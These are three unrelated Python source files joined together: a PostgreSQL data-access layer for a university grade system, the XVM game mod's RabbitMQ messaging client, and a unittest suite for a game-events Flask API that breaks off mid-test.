print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
##Create New User Administrator##
def createAdmin(self, userid, name, surname, email):
try:
SQL = "INSERT INTO \"GMan\".admin (user_id, \"name\", surname, email, \"position\", status)\
VALUES(%s, %s,%s, %s, %s,%s)"
DATA = (userid, name, surname, email, 0, 0)
self.query.execute(SQL, DATA)
self.connection.commit()
return (1, 1)
except psycopg2.IntegrityError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
except psycopg2.DataError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
##Database Class for Course-Related Functions##
class databaseCourse(database):
##Get Course Name##
def getCourseName(self, courseID):
SQL = "SELECT \"courseName\" FROM \"GMan\".course WHERE \"courseID\"=%s"
DATA = (courseID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
##Get Course Information by Professor ID##
def getCourseProfessor(self, professorID):
SQL = "SELECT * FROM \"GMan\".course WHERE \"professorID\"=%s"
DATA = (professorID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
##Get Course Information by Faculty ID##
def getCourseFaculty(self, facultyID):
SQL = "SELECT * FROM \"GMan\".course WHERE \"facultyID\"=%s ORDER BY \"majorID\", \"courseID\""
DATA = (facultyID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
##Get Course in the current Term by Faculty and Major##
def termCourse(self, faculty, major, year, term):
SQL = "SELECT * FROM \"GMan\".course WHERE \"facultyID\"=%s AND \"majorID\"=%s AND \"year\"=%s AND term =%s \
ORDER BY \"courseID\""
DATA = (faculty, major, year, term)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
##Get the Course of a user which the grades have not been given yet.##
def currentCourse(self, user_id):
SQL = "SELECT course.* FROM \"GMan\".\"data\" data,\"GMan\".course WHERE data.user_id=%s AND \
data.grade IS NULL AND data.\"courseID\" = course.\"courseID\" ORDER BY \"data\".\"courseID\""
DATA = (user_id,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
##Creates a new course##
def addCourse(self, information):
try:
SQL = "INSERT INTO \"GMan\".course (\"courseID\", \"courseName\", \"facultyID\",\
\"majorID\", \"professorID\", \"year\", term, \"time\", building, room, credits,\"maxStud\", pre, amt)\
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
DATA = (information["courseID"],information["courseName"],information["facultyID"],\
information["majorID"],information["lecturer"], information["year"], information["term"], \
information["period"],information["building"], information["room"],information["credit"], \
information["student_limit"],information["pre"],information["student_limit"])
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
except psycopg2.IntegrityError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
except psycopg2.DataError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
##Drop a user from a course##
def dropCourseUser(self, user_id, courseID, year_taken, limit):
SQL = "DELETE FROM \"GMan\".\"data\" WHERE user_id=%s AND \"courseID\"=%s AND year_taken=%s"
DATA = (user_id, courseID, year_taken)
self.query.execute(SQL, DATA)
self.connection.commit()
self.increaseLimitOne(courseID, limit)
return 1
##Add a user to a course##
def addCourseUser(self, user_id, year, term, courseID, year_taken, limit):
try:
SQL = "INSERT INTO \"GMan\".\"data\" (user_id, \"courseID\", year_taken, \"year\", term) \
VALUES(%s, %s, %s, %s, %s)"
DATA = (user_id, courseID, year_taken, year, term)
self.query.execute(SQL, DATA)
self.connection.commit()
self.decreaseLimitOne(courseID, limit)
return 1
except psycopg2.IntegrityError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
##Increase user amount in a course by one##
def increaseLimitOne(self, courseID, oldLimit):
SQL = "UPDATE \"GMan\".course SET \"maxStud\"=%s WHERE \"courseID\"=%s"
DATA = (oldLimit+1, courseID)
self.query.execute(SQL, DATA)
self.connection.commit()
##Decrease user amount in a course by one##
def decreaseLimitOne(self, courseID, oldLimit):
SQL = "UPDATE \"GMan\".course SET \"maxStud\"=%s WHERE \"courseID\"=%s"
DATA = (oldLimit - 1, courseID)
self.query.execute(SQL, DATA)
self.connection.commit()
##Select all Course where a user has taken or is taking##
def allUserCourse(self, user_id):
SQL = "SELECT * FROM \"GMan\".\"data\" WHERE user_id=%s ORDER BY \"courseID\""
DATA = (user_id,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
##Get All Course information##
def getAllCourseINFO(self):
SQL = "SELECT * FROM \"GMan\".\"course\" ORDER BY \"courseID\""
self.query.execute(SQL)
resultset = self.query.fetchall()
return resultset
##Get Professor Information by Course##
def findProfessorbyCourseID(self, courseID):
SQL = "SELECT \"professorID\" FROM \"GMan\".\"course\" WHERE \"courseID\" = %s"
DATA = (courseID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
if(resultset!=None):
SQL = "SELECT * FROM \"GMan\".professor WHERE user_id = %s"
DATA = (resultset.professorID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
return None
##Get Course Information by courseID##
def getCoursebyID(self, courseID):
SQL = "SELECT * FROM \"GMan\".\"course\" WHERE \"courseID\" = %s"
DATA = (courseID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
##Assign a professor to a course##
def setProfessor(self, courseID, professorID):
try:
SQL = "UPDATE \"GMan\".course SET \"professorID\"=%s WHERE \"courseID\"=%s"
DATA = (professorID,courseID)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
except psycopg2.IntegrityError:
return 0
class databaseGrade(database):
def getPastCourse(self, user_id):
SQL = "SELECT * FROM \"GMan\".\"data\" WHERE user_id=%s AND grade IS NOT NULL ORDER BY \"year\", term"
DATA = (user_id,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchall()
resultsetCourse = []
for elements in resultsetData:
SQL = "SELECT * FROM \"GMan\".course WHERE \"courseID\"=%s"
DATA = (elements.courseID,)
self.query.execute(SQL, DATA)
resultsetCourse.append(self.query.fetchone())
return resultsetData, resultsetCourse
def getCurrentCourse(self, user_id, year, term):
SQL = "SELECT * FROM \"GMan\".\"data\" WHERE user_id=%s AND \"year\"=%s AND term =%s ORDER BY \"courseID\""
DATA = (user_id,year, term)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchall()
resultsetCourse = []
for elements in resultsetData:
SQL = "SELECT * FROM \"GMan\".course WHERE \"courseID\"=%s"
DATA = (elements.courseID,)
self.query.execute(SQL, DATA)
resultsetCourse.append(self.query.fetchone())
return resultsetData, resultsetCourse
def updateDataStudent(self, id, status, gpa):
SQL = "UPDATE \"GMan\".student SET gpa=%s, status =%s WHERE \"user_id\"=%s"
DATA = (gpa, status, id)
self.query.execute(SQL, DATA)
self.connection.commit()
def getAllUserCourse(self, courseID, year):
SQL = "SELECT * FROM \"GMan\".\"data\" WHERE \"courseID\" = %s AND year_taken = %s ORDER BY user_id"
DATA = (courseID, year)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
def getUserData(self, userID):
temp = {}
for data in userID:
SQL = "SELECT user_id, \"name\", surname FROM \"GMan\".student WHERE \"user_id\" = %s"
DATA = (data.user_id,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
temp[data.user_id] = resultset.name + " " + resultset.surname
return temp
def updateUserGrade(self, data, courseID, year):
for items in data:
if (len(items) >= 2):
repeat = 0
if(items[1] == "F"):
repeat = 2
elif(items[1] == "D+" or items[1] == "D"):
repeat = 1
SQL = "UPDATE \"GMan\".\"data\" SET grade=%s, \"allowRepeat\"=%s WHERE user_id=%s AND \"courseID\"=%s AND year_taken=%s"
DATA = (items[1], repeat, items[0], courseID, year)
self.query.execute(SQL, DATA)
self.connection.commit()
else:
return 0
return 1
class databaseAdmin(database):
def incrementData(self):
temp = 10
SQL = "SELECT term FROM \"GMan\".student"
self.query.execute(SQL)
resultset = self.query.fetchone()
term = resultset.term
if(term == 1):
SQL = "UPDATE \"GMan\".student SET term=2 WHERE term = 1"
self.query.execute(SQL)
self.connection.commit()
SQL = "UPDATE \"GMan\".course SET \"maxStud\" = amt"
self.query.execute(SQL)
self.connection.commit()
if(term == 2):
SQL = "UPDATE \"GMan\".student SET term=1 WHERE term = 2"
self.query.execute(SQL)
self.connection.commit()
SQL = "UPDATE \"GMan\".course SET \"maxStud\" = amt"
self.query.execute(SQL)
self.connection.commit()
for i in range(10,0,-1):
SQL = "UPDATE \"GMan\".student SET \"year\"=%s WHERE \"year\" = %s"
DATA = (str(temp), str(temp-1))
print(SQL, DATA)
self.query.execute(SQL, DATA)
self.connection.commit()
temp = temp - 1
return 1
def getallMajors(self, faculty_id):
SQL = "SELECT * FROM \"GMan\".majors WHERE \"facultyID\"=%s ORDER BY \"majorID\""
DATA = (faculty_id,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchall()
resultsetAmt = []
for elements in resultsetData:
SQL = "SELECT count(*) FROM \"GMan\".student WHERE \"majorID\"=%s"
DATA = (elements.majorID,)
self.query.execute(SQL, DATA)
amt = self.query.fetchone()
resultsetAmt.append(amt.count)
if(amt.count != elements.studentAmt):
SQL = "UPDATE \"GMan\".majors SET \"studentAmt\"=%s WHERE \"majorID\"=%s"
DATA = (amt.count,elements.majorID)
self.query.execute(SQL, DATA)
self.connection.commit()
return resultsetData, resultsetAmt
def addMajors(self, faculty_id, major_id, degree):
try:
SQL = "INSERT INTO \"GMan\".majors (\"majorID\", \"facultyID\", \"degree\", \"studentAmt\") VALUES(%s, %s, %s, 0)"
DATA = (major_id, faculty_id, degree)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
except psycopg2.IntegrityError:
return "DUPLICATE"
def getallFaculty(self):
SQL = "SELECT * FROM \"GMan\".faculty ORDER BY \"facultyID\""
self.query.execute(SQL)
resultsetData = self.query.fetchall()
resultsetAmt = []
for elements in resultsetData:
SQL = "SELECT count(*) FROM \"GMan\".student WHERE \"facultyID\"=%s"
DATA = (elements.facultyID,)
self.query.execute(SQL, DATA)
amt = self.query.fetchone()
resultsetAmt.append(amt.count)
if (amt.count != elements.studentAmt):
SQL = "UPDATE \"GMan\".faculty SET \"studentAmt\"=%s WHERE \"facultyID\"=%s"
DATA = (amt.count, elements.facultyID)
self.query.execute(SQL, DATA)
self.connection.commit()
return resultsetData, resultsetAmt
def addFaculty(self, faculty_id, faculty_name):
try:
SQL = "INSERT INTO \"GMan\".faculty (\"facultyID\", \"facultyName\", \"userAmt\", \"studentAmt\") VALUES(%s, %s, 0, 0)"
DATA = (faculty_id, faculty_name)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
except psycopg2.IntegrityError:
return "DUPLICATE"
class databaseMessage(database):
def getMessage(self, userID):
SQL = "SELECT * FROM \"GMan\".message WHERE \"toUser\" = %s AND dismiss = '0'"
DATA = (userID,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchall()
return resultset
def dismissMessage(self, userID):
SQL = "UPDATE \"GMan\".message SET dismiss='1' WHERE \"toUser\"=%s"
DATA = (userID,)
self.query.execute(SQL, DATA)
self.connection.commit()
def sendMessage(self, toUser, fromUser, message, time):
try:
SQL = "INSERT INTO \"GMan\".message (\"fromUser\", \"toUser\", message, \"time\", dismiss) VALUES(%s, %s, %s, %s, '0')"
DATA = (fromUser, toUser, message, time)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
except psycopg2.IntegrityError:
return 0
|
|
""" XVM (c) www.modxvm.com 2013-2017 """
__all__ = ['start', 'stop', 'call']
# PUBLIC
import os
import threading
import simplejson
import traceback
import uuid
import BigWorld
from gui.shared import g_eventBus, events
import pika
from pika import exceptions as pika_exceptions
from xfw import *
from xvm_main.python.logger import *
import xvm_main.python.config as config
import xvm_main.python.minimap_circles as minimap_circles
import xvm_main.python.utils as utils
from xvm_main.python.consts import *
from xvm_main.python.xvm import g_xvm
from consts import *
XMQP_DEVELOPMENT = os.environ.get('XMQP_DEVELOPMENT') == '1'
_xmqp = None
_xmqp_thread = None
def is_active():
global _xmqp_thread, _xmqp
return _xmqp_thread and _xmqp.is_consuming
def start():
BigWorld.player().arena.onNewVehicleListReceived -= start
BigWorld.callback(0, _start)
def _start(e=None):
g_eventBus.removeListener(XVM_EVENT.XVM_SERVICES_INITIALIZED, _start)
if not g_xvm.xvmServicesInitialized:
g_eventBus.addListener(XVM_EVENT.XVM_SERVICES_INITIALIZED, _start)
return
if (config.networkServicesSettings.xmqp and not isReplay()) or XMQP_DEVELOPMENT:
token = config.token.token
if token:
players = []
player = BigWorld.player()
for (vehicleID, vData) in player.arena.vehicles.iteritems():
# ally team only
if vData['team'] == player.team:
players.append(vData['accountDBID'])
if XMQP_DEVELOPMENT:
accountDBID = utils.getAccountDBID()
if accountDBID not in players:
players.append(accountDBID)
#players.append(42)
#players.append(43)
# start
stop()
global _xmqp_thread, _xmqp
_xmqp = _XMQP(players)
_xmqp_thread = threading.Thread(target=_xmqp.start, name='xmqp')
_xmqp_thread.setDaemon(True)
_xmqp_thread.start()
debug('[XMQP] Thread started')
def stop():
global _xmqp_thread, _xmqp
if _xmqp_thread:
_xmqp.stop()
_xmqp_thread.join()
_xmqp_thread = None
debug('[XMQP] Thread stopped')
_xmqp = None
def call(message):
global _xmqp
if _xmqp:
_xmqp.call(message)
def getCapabilitiesData():
capabilities = {}
mcdata = minimap_circles.getMinimapCirclesData()
if mcdata:
capabilities['sixthSense'] = mcdata.get('commander_sixthSense', None)
#capabilities['sixthSense'] = True # for debug
return capabilities
players_capabilities = {}
# PRIVATE
class _XMQP(object):
"""This is an xmqp consumer that will handle unexpected interactions
with RabbitMQ such as channel and connection closures.
If RabbitMQ closes the connection, it will reopen it. You should
look at the output, as there are limited reasons why the connection may
be closed, which usually are tied to permission related issues or
socket timeouts.
If the channel is closed, it will indicate a problem with one of the
commands that were issued and that should surface in the output as well.
"""
def __init__(self, players):
"""Create a new instance of the consumer class, passing in the AMQP
URL used to connect to RabbitMQ.
"""
self._players = players
self._consuming = False
self._closing = False
self._connection = None
self._channel = None
self._consumer_tag = None
self._exchange_name = None
self._queue_name = None
#self._correlation_id = None
self._exchange_correlation_id = None
self._reconnect_attempts = 0
global players_capabilities
players_capabilities = {}
@property
def is_consuming(self):
return self._consuming
def start(self):
"""Run the xmqp consumer by connecting to RabbitMQ and then
starting the IOLoop to block and allow the SelectConnection to operate.
"""
debug('[XMQP] Starting')
self._connection = self.connect()
self.start_ioloop()
def stop(self):
"""Cleanly shutdown the connection to RabbitMQ by stopping the consumer
with RabbitMQ. When RabbitMQ confirms the cancellation, on_cancelok
will be invoked by pika, which will then closing the channel and
connection. The IOLoop is started again because this method is invoked
when CTRL-C is pressed raising a KeyboardInterrupt exception. This
exception stops the IOLoop which needs to be running for pika to
communicate with RabbitMQ. All of the commands issued prior to starting
the IOLoop will be buffered but not processed.
"""
try:
debug('[XMQP] Stopping')
self._connection.ioloop.stop()
if self.is_consuming:
self.stop_consuming()
if self._channel and self._channel.is_open:
self.close_channel()
if self._connection and self._connection.is_open:
self.close_connection()
self._connection.ioloop.stop()
debug('[XMQP] Stopped')
except (pika_exceptions.ChannelClosed, pika_exceptions.ConnectionClosed):
debug(traceback.format_exc())
except Exception as ex:
err(traceback.format_exc())
def call(self, data):
if self.is_consuming and self._exchange_name is not None:
try:
#self._correlation_id = str(uuid.uuid4())
message = simplejson.dumps({'accountDBID': utils.getAccountDBID(), 'data': data})
debug('[XMQP] call: %s' % utils.hide_guid(message))
self._channel.basic_publish(
exchange=self._exchange_name,
routing_key='',
#properties=pika.BasicProperties(
# reply_to=self._queue_name,
# correlation_id=self._correlation_id),
body=message)
except Exception as ex:
err('_exchange_name=' + str(self._exchange_name))
err(traceback.format_exc())
# INTERNAL
def on_message(self, unused_channel, basic_deliver, properties, body):
"""Invoked by pika when a message is delivered from RabbitMQ. The
channel is passed for your convenience. The basic_deliver object that
is passed in carries the exchange, delivery tag and a redelivered flag
for the message. The properties passed in is an instance of
BasicProperties with the message properties and the body is the
message that was sent.
:param pika.channel.Channel unused_channel: The channel object
:param pika.Spec.Basic.Deliver: basic_deliver method
:param pika.Spec.BasicProperties: properties
:param str|unicode body: The message body
"""
if self._closing:
return
try:
#debug('[XMQP] Received message #%s: %s' % (basic_deliver.delivery_tag, body))
debug('[XMQP] recv: %s' % body)
#debug(basic_deliver)
#if body != 'ok':
# debug('[XMQP] Received message #%s: %s' % (basic_deliver.delivery_tag, body))
if self._exchange_correlation_id == properties.correlation_id:
response = simplejson.loads(body)
if 'exchange' in response:
self._exchange_name = response['exchange']
global players_capabilities
for accountDBID, data in response['users'].iteritems():
players_capabilities[int(accountDBID)] = simplejson.loads(data) if data else {}
self.bind_channel()
else:
log("[XMQP] ERROR: response='{}'".format(body))
self.stop()
else:
#elif basic_deliver.exchange:
#debug('[XMQP] recv: {} {}'.format(properties.headers.get('userId', None), body))
response = simplejson.loads(body)
g_eventBus.handleEvent(events.HasCtxEvent(XVM_BATTLE_EVENT.XMQP_MESSAGE, response))
except Exception as ex:
err(traceback.format_exc())
def start_ioloop(self):
try:
self._connection.ioloop.start()
except Exception as ex:
err(traceback.format_exc())
def connect(self):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
debug('[XMQP] Connecting')
credentials = pika.PlainCredentials('xvm', 'xvm')
params = pika.ConnectionParameters(
host=XVM.XMQP_SERVER,
#port=XVM.XMQP_SERVER_PORT,
virtual_host='xvm',
credentials=credentials,
#channel_max=None,
#frame_max=None,
#heartbeat=None,
#ssl=None,
#ssl_options=None,
connection_attempts=3,
retry_delay=3,
socket_timeout=1,
#locale=None,
#backpressure_detection=None,
blocked_connection_timeout=5)
#client_properties=_DEFAULT)
return pika.SelectConnection(
params,
on_open_error_callback=self.on_open_connection_error,
on_open_callback=self.on_connection_open,
stop_ioloop_on_close=False)
def on_open_connection_error(self, unused_connection, error_message=None):
err('[XMQP] on_open_connection_error %s' % repr(pika_exceptions.AMQPConnectionError(error_message or
self._connection.params.connection_attempts)))
self._connection.ioloop.stop()
def on_connection_open(self, unused_connection):
"""This method is called by pika once the connection to RabbitMQ has
been established. It passes the handle to the connection object in
case we need it, but in this case, we'll just mark it unused.
:type unused_connection: pika.SelectConnection
"""
debug('[XMQP] Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def on_connection_closed(self, connection, reply_code, reply_text):
"""This method is invoked by pika when the connection to RabbitMQ is
closed unexpectedly. Since it is unexpected, we will reconnect to
RabbitMQ if it disconnects.
:param pika.connection.Connection connection: The closed connection obj
:param int reply_code: The server provided reply_code if given
:param str reply_text: The server provided reply_text if given
"""
self._consuming = False
self._channel = None
if self._closing:
self._connection.ioloop.stop()
elif self._reconnect_attempts >= 3:
debug('[XMQP] Connection closed, maximum reopen attempts reached')
self._connection.ioloop.stop()
else:
debug('[XMQP] Connection closed, reopening in 5 seconds: (%s) %s' % (reply_code, reply_text))
self._connection.add_timeout(5, self.reconnect)
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is
closed. See the on_connection_closed method.
"""
debug('[XMQP] Reconnecting')
# This is the old connection IOLoop instance, stop its ioloop
self._connection.ioloop.stop()
if not self._closing:
self._reconnect_attempts += 1
self._connection = self.connect()
self.start_ioloop()
def open_channel(self):
"""Open a new channel with RabbitMQ by issuing the Channel.Open RPC
command. When RabbitMQ responds that the channel is open, the
on_channel_open callback will be invoked by pika.
"""
debug('[XMQP] Creating a new channel')
self._connection.channel(on_open_callback=self.on_channel_open)
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened.
The channel object is passed in so we can make use of it.
Since the channel is now open, we'll declare the exchange to use.
:param pika.channel.Channel channel: The channel object
"""
if self._closing:
return
debug('[XMQP] Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_queue()
def setup_queue(self):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
"""
debug('[XMQP] Declaring queue')
self._channel.queue_declare(self.on_queue_declareok, exclusive=True)
def on_queue_declareok(self, method_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange by issuing the Queue.Bind RPC command.
When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
if self._closing:
return
self._queue_name = method_frame.method.queue
debug('[XMQP] queue: %s' % (self._queue_name))
self.start_consuming()
self.get_exchange_name()
def start_consuming(self):
"""This method sets up the consumer by first calling
add_on_cancel_callback so that the object is notified if RabbitMQ
cancels the consumer. It then issues the Basic.Consume RPC command
which returns the consumer tag that is used to uniquely identify the
consumer with RabbitMQ. We keep the value to use it when we want to
cancel consuming. The on_message method is passed in as a callback pika
will invoke when a message is fully received.
"""
debug('[XMQP] Issuing consumer related RPC commands')
self._consuming = True
self.add_on_cancel_callback()
self._consumer_tag = self._channel.basic_consume(self.on_message, self._queue_name, no_ack=True)
def get_exchange_name(self):
debug('[XMQP] Getting exchange name')
self._exchange_correlation_id = str(uuid.uuid4())
message = simplejson.dumps({
'token': config.token.token,
'players': self._players,
'capabilities': simplejson.dumps(getCapabilitiesData())})
debug('[XMQP] %s' % utils.hide_guid(message))
self._channel.basic_publish(
exchange=XVM.XMQP_LOBBY_EXCHANGE,
routing_key=XVM.XMQP_LOBBY_ROUTING_KEY,
properties=pika.BasicProperties(
reply_to=self._queue_name,
correlation_id=self._exchange_correlation_id,
),
body=message)
def bind_channel(self):
debug('[XMQP] Binding %s to %s' % (self._exchange_name, self._queue_name))
self._channel.queue_bind(self.on_bindok, self._queue_name, self._exchange_name)
def on_bindok(self, unused_frame):
"""Invoked by pika when the Queue.Bind method has completed. At this
point we will start consuming messages by calling start_consuming
which will invoke the needed RPC commands to start the process.
:param pika.frame.Method unused_frame: The Queue.BindOk response frame
"""
debug('[XMQP] Queue bound')
self._reconnect_attempts = 0
g_eventBus.handleEvent(events.HasCtxEvent(XVM_BATTLE_EVENT.XMQP_CONNECTED))
# service methods
def add_on_connection_close_callback(self):
"""This method adds an on close callback that will be invoked by pika
when RabbitMQ closes the connection to the publisher unexpectedly.
"""
debug('[XMQP] Adding connection close callback')
self._connection.add_on_close_callback(self.on_connection_closed)
def add_on_channel_close_callback(self):
"""This method tells pika to call the on_channel_closed method if
RabbitMQ unexpectedly closes the channel.
"""
debug('[XMQP] Adding channel close callback')
self._channel.add_on_close_callback(self.on_channel_closed)
def on_channel_closed(self, channel, reply_code, reply_text):
"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel: The closed channel
:param int reply_code: The numeric reason the channel was closed
:param str reply_text: The text reason the channel was closed
"""
debug('[XMQP] Channel %i was closed: (%s) %s' % (channel, reply_code, reply_text))
self._connection.close()
def add_on_cancel_callback(self):
"""Add a callback that will be invoked if RabbitMQ cancels the consumer
for some reason. If RabbitMQ does cancel the consumer,
on_consumer_cancelled will be invoked by pika.
"""
debug('[XMQP] Adding consumer cancellation callback')
self._channel.add_on_cancel_callback(self.on_consumer_cancelled)
def on_consumer_cancelled(self, method_frame):
"""Invoked by pika when RabbitMQ sends a Basic.Cancel for a consumer
receiving messages.
:param pika.frame.Method method_frame: The Basic.Cancel frame
"""
debug('[XMQP] Consumer was cancelled remotely, shutting down: %r' % (method_frame))
if self._channel:
self._channel.close()
def stop_consuming(self):
"""Tell RabbitMQ that you would like to stop consuming by sending the
Basic.Cancel RPC command.
"""
self._consuming = False
self._closing = True
if self._channel:
debug('[XMQP] Sending a Basic.Cancel RPC command to RabbitMQ')
self._channel.basic_cancel(self.on_cancelok, self._consumer_tag)
def on_cancelok(self, unused_frame):
"""This method is invoked by pika when RabbitMQ acknowledges the
cancellation of a consumer. At this point we will close the channel.
This will invoke the on_channel_closed method once the channel has been
closed, which will in-turn close the connection.
:param pika.frame.Method unused_frame: The Basic.CancelOk frame
"""
debug('[XMQP] RabbitMQ acknowledged the cancellation of the consumer')
self.close_channel()
def close_channel(self):
debug('[XMQP] Closing the channel')
self._consuming = False
self._closing = True
if self._channel is not None:
self._channel.close()
def close_connection(self):
"""This method closes the connection to RabbitMQ."""
debug('[XMQP] Closing connection')
self._consuming = False
self._closing = True
self._connection.close()
|
|
import unittest
import time
import datetime
import json
import sys
#import base64
#from werkzeug.wrappers import Response
sys.path.append("..")
#from flask import current_app
#from werkzeug.datastructures import Headers
from gameevents_app import create_app
#Extensions
from gameevents_app.extensions import db, LOG
from gameevents_app.models.session import Session
from gameevents_app.models.client import Client
from gameevents_app.models.gameevent import GameEvent
from uuid import UUID
import OpenSSL
#from gameevents_app.errors import InvalidGamingSession
#from sqlalchemy.orm.exc import NoResultFound
#from flask.ext.api.exceptions import AuthenticationFailed
class TestGameEvents(unittest.TestCase):
@classmethod
def setUpClass(self):
self.app = create_app(testing=True)
self.app_context = self.app.app_context()
self.app_context.push()
self.client = self.app.test_client()
LOG.info("Initializing tests.")
#Create a brand new test db
db.create_all()
#Add a clientid and apikey
new_client = Client("myclientid", "myapikey", "normal")
new_admin_client = Client("dashboard", "dashboardapikey", "admin")
db.session.add(new_client)
db.session.add(new_admin_client)
try:
db.session.commit()
LOG.info("=== Added clients ===")
except Exception as e:
LOG.error(e, exc_info=True)
#Generating gaming sessions ids
self.newsessionid = UUID(bytes = OpenSSL.rand.bytes(16)).hex
self.newsessionid2 = UUID(bytes = OpenSSL.rand.bytes(16)).hex
self.newsessionid3 = UUID(bytes = OpenSSL.rand.bytes(16)).hex #session not in db
self.unauthorized_sessionid = "ac52bb1d811356ab3a8e8711c5f7ac5d"
new_session = Session(self.newsessionid, new_client.id)
new_session2 = Session(self.newsessionid2, new_client.id)
db.session.add(new_session)
db.session.add(new_session2)
try:
db.session.commit()
LOG.info("=== Added sessions ===")
LOG.info("=== Session not in db: %s ===" % self.newsessionid3)
except Exception as e:
LOG.error(e, exc_info=True)
#Generating tokens
self.mytoken = new_client.generate_auth_token(self.newsessionid)
self.myexpiredtoken = new_client.generate_auth_token(self.newsessionid, expiration=1)
self.mytokennewsession = new_client.generate_auth_token(self.newsessionid3)
self.myadmintoken = new_admin_client.generate_auth_token()
self.myexpiredadmintoken = new_admin_client.generate_auth_token(expiration=1)
self.mybadtoken = "badlogin" + self.mytoken.decode()[8:]
self.mybadtoken = self.mybadtoken.encode("ascii")
self.xml_valid_event = """<event><timestamp>2015-11-29T12:10:57Z</timestamp>
<action>STARTGAME</action><level></level><update></update><which_lix>
</which_lix><result></result></event>""";
self.json_valid_event = """[{
"timestamp": "2015-11-29T12:10:57Z",
"action": "STARTGAME",
"which_lix": ""
}]"""
self.xml_invalid_event = """<event>a
<action>STARTGAME</action>
<timestamp>2015-11-29T12:10:57Z</timestamp>
<which_lix />
</event>"""
self.json_invalid_event = """
"timestamp": "2015-11-29T12:10:57Z",
"action": "STARTGAME",,
"which_lix": ""
"""
self.xml_multiple_events = """<event>
<action>STARTGAME</action>
<timestamp>2015-11-29T12:10:57Z</timestamp>
<which_lix />
</event>
<event>
<action>ENDGAME</action>
<timestamp>2015-11-29T13:10:57Z</timestamp>
<which_lix />
</event>"""
self.json_multiple_events = """[{ "timestamp": "2015-11-29T12:10:57Z",
"action": "STARTGAME",
"which_lix": ""
}, {
"timestamp": "2015-11-29T13:10:57Z",
"action": "ENDGAME",
"which_lix": ""
}]"""
time.sleep(3) #expire the token
new_gameevent = GameEvent(new_session.id,self.xml_valid_event)
db.session.add(new_gameevent)
try:
db.session.commit()
LOG.info("=== Added game event. All set up. ===")
except Exception as e:
LOG.error(e, exc_info=True)
@classmethod
def tearDownClass(self):
LOG.info("======================Finished tests====================")
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_token_existing_sessionid(self):
'''
Token request with valid credentials and existing sessionid.
'''
requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey", sessionid = self.newsessionid))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
# Assert response is 200 OK.
self.assertEquals(response.status, "200 OK")
def test_token_nonexisting_but_valid_sessionid(self):
'''
Token request with valid credentials and a valid - but still not in the db - sessionid.
'''
requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey", sessionid = self.newsessionid3))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
# Assert response is 200 OK.
self.assertEquals(response.status, "200 OK")
def test_token_invalid_sessionid(self):
'''
Token request with valid credentials but invalid sessionid.
'''
requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey", sessionid = "bablablabal"))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "400 BAD REQUEST")
def test_token_unauthorized_sessionid(self):
'''
Token request with valid credentials but invalid sessionid.
'''
requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey", sessionid = self.unauthorized_sessionid))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
self.assertEquals(response.status, "401 UNAUTHORIZED")
def test_get_admin_token(self):
'''
Admin token request with valid credentials.
'''
requestdata = json.dumps(dict(clientid="dashboard", apikey="dashboardapikey"))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
follow_redirects=True)
# Assert response is 200 OK.
self.assertEquals(response.status, "200 OK")
def test_token_badparams(self):
'''
Token request with missing parameters.
'''
requestdata = json.dumps(dict(clientid="myclientid"))
response = self.client.post('/gameevents/api/v1.0/token',
data=requestdata,
content_type = 'application/json',
